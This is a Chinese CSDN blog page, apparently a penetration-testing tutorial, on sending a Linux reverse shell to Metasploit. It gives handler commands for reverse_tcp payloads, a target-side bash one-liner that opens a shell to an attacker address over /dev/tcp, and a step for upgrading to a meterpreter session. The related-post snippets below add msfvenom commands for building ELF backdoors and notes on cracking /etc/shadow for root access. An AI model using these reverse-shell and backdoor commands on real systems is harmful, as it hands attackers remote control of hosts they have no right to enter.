linux使用命令反弹到 msf

？？？？27282

已于 2022-09-12 19:18:38 修改

阅读量724

点赞数 1

分类专栏：优秀文章秀秀文章标签： linux bash 运维 msf

于 2022-09-12 10:03:13 首次发布

本文链接：https://blog.csdn.net/qq_52549196/article/details/126813398

版权

优秀文章同时被 2 个专栏收录

166 篇文章 58 订阅 ¥9.90 ¥99.00

订阅专栏

秀秀

178 篇文章 2 订阅

订阅专栏

本文详细介绍了如何在Linux环境中利用bash命令监听payload，并通过选择合适的模块，将shell转换为meterpreter会话。首先，使用handler命令在后台进行监听。接着，选择一个payload模块执行。然后，在靶机上运行特定命令。最后，通过shell_to_meterpreter将shell提升为meterpreter，以实现更深入的控制。

摘要由CSDN通过智能技术生成

文章目录

监听payload选择
靶机上执行命令
shell_to_meterpreter

监听payload选择

handler 会以后台的方式监听,更方便打开

 handler -H 192.168.88.88 -P 4444 -p  linux/x86/shell/reverse_tcp -n msf_linux_bash
 handler -H 192.168.88.88 -P 4444 -p  linux/x64/shell/reverse_tcp -n msf_linux_bash
 handler -H 192.168.88.88 -P 4444 -p  cmd/unix/reverse_bash -n msf_reverse_bash

任选一个 payload 模块使用 ,这里我用 linux/x86/shell/reverse_tcp
在这里插入图片描述

靶机上执行命令

echo 'bash -i >& /dev/tcp/192.168.88.88/4444 0>&1'

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

？？？？27282

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

正向shell和反弹shell

weixin_45936149的博客

03-26

1万+

正向shell反弹shell的利用场景以及使用技巧

linux系统安装msf的过程详解

09-14

总结，安装Linux上的Metasploit Framework需要下载安装脚本，解决依赖问题，创建用户并设置权限，以及了解如何使用MSF的命令行工具。通过这些步骤，你可以顺利地在Linux环境中搭建起MSF环境，进行安全测试和研究。...

参与评论您还未登录，请先登录后发表或查看评论

linux反弹shell方法

weixin_53747497的博客

07-12

2197

被控端主动发起连接请求去连接控制端，通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i ：打开一个交互式的bash shell/dev/tcp/IP/PORT ： /dev/tcp/是Linux中的一个特殊设备文件（Linux一切皆文件），实际这个文件是不存在的，它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出，为了确保命令执行后的输入被正确的传回攻击机。

msf生成linux elf木马反弹shell

shatianyzg的博客

06-13

1644

攻击机：Kali 192.168.241.128 靶机：centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释： inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k

msf--Linux反弹shell--一看就会的实验

lxlxxxlx的博客

09-22

3488

msf--Linux反弹shell--一看就会的实验

kali linux中meterpreter使用前的反弹shell及其基础语法

qq_42133828的博客

12-02

8173

一.反弹shell的类型： 1.reverse_tcp （基于TCP反向链接反弹shell） 1）.在kali linux终端中，生成一个反弹shell linux版： msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如： msfveno...

msf命令全集

06-05

MSF 命令全集 MSF（Metasploit Framework）是一款功能强大且功能丰富的渗透测试工具，提供了多种命令来实现各种功能。下面是 MSF 命令全集的详细解释：基本命令 * `?`：帮助菜单，显示所有可用的命令 * `back`：...

kali linux msf系列视频教程

10-25

kali linux msf系列教程 -------------------------------------------- kali msf 系列第一章虚拟机使用 kali msf 系列第一章虚拟机使用 kali msf 系列第二章MSF基础使用+第一个实验 kali msf 系列第三章浏览器...

kali linux-msf-ssh爆破

10-13

### Kali Linux下的MSF与SSH爆破技巧详解 #### 一、背景介绍随着网络安全威胁的日益增多，渗透测试成为保障系统安全的重要手段之一。Kali Linux是一款专门为渗透测试和安全审计设计的操作系统，内置了大量的安全...

使用MSF进行提权（windows提权、linux提权、wesng使用

最新发布

喜欢Python编程的程序员柚柚呀

02-29

1280

安全焦点，其BugTraq是一个出色的漏洞和exploit数据源，可以通过CVE编号，或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器（靶机）C:\RECYCLER\s.exe 目录（因为一般C:\RECYCLER\ 目录都有读写权限）选定需要使用的攻击模块之后，你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用，将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣，这将非常有用。为此，可以分别使用。

信息安全技术（二）-- 利用 metasploit 创建并反弹 shell

yi23456qi的博客

06-19

509

知识是不断从学习中得到的，经验是从尝试中得到的！

msf反弹php shell,msf实现linux shell反弹

weixin_42488997的博客

03-22

771

运行环境：kali ip：192.168.123.90Linux ip：192.168.123.5Linux服务器上开有80端口，并且有上传话不多说，上传一句话，菜刀连接。然后打开kali 并启动msf进入> use exploit/multi/handler设置 payload> set payload php/metrpreter/reverse_tcp...

20202407 2021-2022-2 《网络与系统攻防技术》实验二实验报告

m0_65266036的博客

03-29

129

(1)使用netcat获取主机操作Shell，cron启动某项任务（任务自定）PS：cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程(2)使用socat获取主机操作Shell, 任务计划启动(3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权。

linux提权秘籍

失心少年

09-27

1030

uname -a/etc/阴影文件包含用户密码哈希，默认情况下，除root用户外，任何用户都无法读取。如果我们能够读取/etc/shadow文件的内容，我们可能能够破解根用户的密码哈希。如果我们能够修改/etc/shadow文件，我们就可以用一个我们知道的密码散列替换根用户的密码哈希。该文件历来包含的用户密码散列。为了向后兼容，如果/etc/passwd中的用户行的第二个字段包含密码哈希，那么它优先/etc/shadow中的哈希。

渗透中的Shell

2301_77004573的博客

10-17

415

用最简单的术语来说，shell是我们在与命令行环境（CLI）接口时使用的。换句话说，Linux中常见的bash或sh程序是shell的例子，Windows上的cmd.exe和Powershell也是如此。当面向远程系统时，有时可以强制在服务器上运行的应用程序（例如 Web 服务器）执行任意代码。发生这种情况时，我们希望使用此初始访问权限来获取在目标上运行的 shell。反弹shell：我们可以强制远程服务器向我们发送对服务器的命令行访问。

制作linux恶意软件获取shell加实战

xiao_he0123的博客

02-25

1281

一.使用msf制作linux后门二. 实战，给软件加后门制作linux后门 1.使用msfvenom生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo -a x64 ...

TomcatCVE-2020-10487任意命令执行（msf反弹shell）

qq_43665434的博客

05-14

1091

TomcatCVE-2020-10487任意命令执行（msf反弹shell）漏洞原理：传送门 Ghostcat本身是一个Local File Include/Read（本地文件包含/读）漏洞，而非任意文件上传/写漏洞。在Apache Tomcat的安全公告页中，Ghostcat被描述为“AJP Request Injection and potential Remote Code Execution”（AJP请求注入和潜在的远程代码执行）漏洞。Potential表明Ghostcat默认情况下并非RCE

Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell

09-06

2542

Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf。

msf反弹shell linux

07-28

MSF(Metasploit Framework)是一个功能强大的渗透测试工具，它提供了生成一句话反弹shell的工具msfvenom。使用msfvenom可以生成各种类型的命令行一句话反弹shell。具体使用方法如下： 1. 首先，打开终端并输入以下命令来生成一句话反弹shell的payload： ``` msfvenom -p linux/x86/shell_reverse_tcp LHOST=<攻击者IP> LPORT=<监听端口> -f <输出格式> -o <输出文件> ``` 其中，`<攻击者IP>`是你的公网IP地址，`<监听端口>`是你希望监听的端口号，`<输出格式>`是你希望生成的payload的格式，例如`elf`或`raw`，`<输出文件>`是生成的payload保存的文件名。 2. 接下来，你可以将生成的payload传输到目标Linux机器上。你可以使用各种方法，例如通过邮件、FTP或者直接复制到目标机器上。 3. 在目标机器上，你需要执行payload来建立与攻击者的连接。你可以使用以下命令来执行payload： ``` bash <payload文件> ``` 其中，`<payload文件>`是你传输到目标机器上的payload文件名。 4. 一旦目标机器执行了payload，它将与你的攻击机器建立连接，并将shell会话反弹给你。请注意，使用Metasploit和msfvenom进行渗透测试需要遵守法律和道德规范。只能在合法授权的范围内使用这些工具。 #### 引用[.reference_title] - *1* *2* [渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(ﾟ益ﾟメ) 渗透测试](https://blog.csdn.net/qq_39611230/article/details/115751964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [linux各种一句话反弹shell总结](https://blog.csdn.net/qq_50854790/article/details/122558518)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]